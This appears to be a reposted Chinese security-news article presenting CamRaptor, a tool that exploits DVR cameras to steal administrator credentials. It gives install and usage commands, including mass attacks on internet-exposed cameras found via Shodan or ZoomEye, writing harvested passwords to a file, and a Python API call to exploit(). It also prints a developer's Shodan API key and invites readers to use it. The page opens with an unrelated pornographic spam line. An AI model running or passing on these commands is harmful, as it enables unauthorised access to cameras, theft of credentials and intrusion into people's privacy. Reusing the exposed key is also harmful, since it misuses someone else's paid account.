压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

CamRaptor:一款針對(duì)DVR攝像頭的漏洞利用工具

關(guān)于CamRaptor

CamRaptor是一款針對(duì)DVR攝像頭的漏洞利用工具,它可以利用當(dāng)前主流DVR攝像頭中的多個(gè)安全漏洞,幫助廣大研究人員獲取目標(biāo)DVR網(wǎng)絡(luò)攝像頭的管理員憑證。

功能介紹

能夠利用當(dāng)前主流DVR攝像頭中的多個(gè)安全漏洞,例如Novo、CeNova和QSee等。

經(jīng)過(guò)優(yōu)化處理,支持以多線程的形式同時(shí)攻擊列表中的多個(gè)目標(biāo)DVR攝像頭。

簡(jiǎn)單的命令行接口和API使用方法。

工具安裝

由于CamRaptor使用Python3開(kāi)發(fā),因此首先需要在本地設(shè)備上安裝并配置好Python3環(huán)境。接下來(lái),廣大研究人員可以使用下列命令下載并安裝CamRaptor:

pip3 install git+https://github.com/EntySec/CamRaptor

工具基礎(chǔ)使用

CamRaptor的使用非常簡(jiǎn)單,我們只需要在命令行終端中輸入“camraptor”命令即可使用CamRaptor:

usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]

?????????????????[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]

?

CamRaptor is a tool that exploits several vulnerabilities in popular DVR

cameras to obtain network camera credentials.

?

optional arguments:

??-h, --help ???????????顯示這個(gè)幫助信息并退出

??-t, --threads ????????啟用多線程模式以獲得更好的性能

??-o OUTPUT, --output OUTPUT

????????????????????????將結(jié)果存儲(chǔ)至文件

??-i INPUT, --input INPUT

????????????????????????地址輸入文件

??-a ADDRESS, --address ADDRESS

????????????????????????提供單個(gè)地址

??--shodan SHODAN ??????通過(guò)網(wǎng)絡(luò)利用遠(yuǎn)程設(shè)備所使用的Shodan API密鑰

??--zoomeye ZOOMEYE ????通過(guò)網(wǎng)絡(luò)利用遠(yuǎn)程設(shè)備所使用的ZoomEye API密鑰

??-p PAGES, --pages PAGES

????????????????????????需要通過(guò)ZoomEye獲取的頁(yè)面數(shù)量

工具使用樣例

攻擊單個(gè)攝像頭

下列命令可以攻擊單個(gè)DVR攝像頭:

camraptor -a 192.168.99.100

通過(guò)網(wǎng)絡(luò)攻擊遠(yuǎn)程DVR攝像頭

接下來(lái),我們可以使用Shodan搜索引擎來(lái)搜索并攻擊網(wǎng)絡(luò)上的攝像頭,此時(shí)我們可以使用-t參數(shù)來(lái)設(shè)置多線程數(shù)量以獲得更好的性能:

camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

注意:項(xiàng)目中給出的Shodan API密鑰(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是開(kāi)發(fā)人員自己的專業(yè)版API密鑰,你可以使用你自己的密鑰,當(dāng)然了你想用開(kāi)發(fā)人員的也沒(méi)意見(jiàn),大家資源共享嘛!

從輸入文件獲取目標(biāo)攝像頭

我們還可以使用開(kāi)放數(shù)據(jù)庫(kù)中提供的攝像頭地址,此時(shí)我們可以使用-t參數(shù)來(lái)設(shè)置多線程數(shù)量以獲得更好的性能:

camraptor -t -i cameras.txt -o passwords.txt

注意:此命令將會(huì)攻擊cameras.txt中給出的所有攝像頭,并會(huì)將所有獲取到的密碼存儲(chǔ)至passwords.txt文件中。

API使用

CamRaptor還提供了自己的Python API,可以將其導(dǎo)入至你們自己的項(xiàng)目代碼中并調(diào)用其功能:

from camraptor import CamRaptor

基礎(chǔ)函數(shù)

exploit(address):根據(jù)給定的地址針對(duì)單個(gè)目標(biāo)執(zhí)行漏洞利用攻擊;

調(diào)用樣例

攻擊單個(gè)攝像頭:

from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')
print(creds)

項(xiàng)目地址

CamRaptor:GitHub傳送門

來(lái)源:FreeBuf.COM

上一篇:PyPI危機(jī):下載超3萬(wàn)次的惡意軟件包、平臺(tái)曝GitHub Actions高危漏洞

下一篇:英美澳多國(guó)聯(lián)合披露過(guò)去兩年被利用最多的30個(gè)漏洞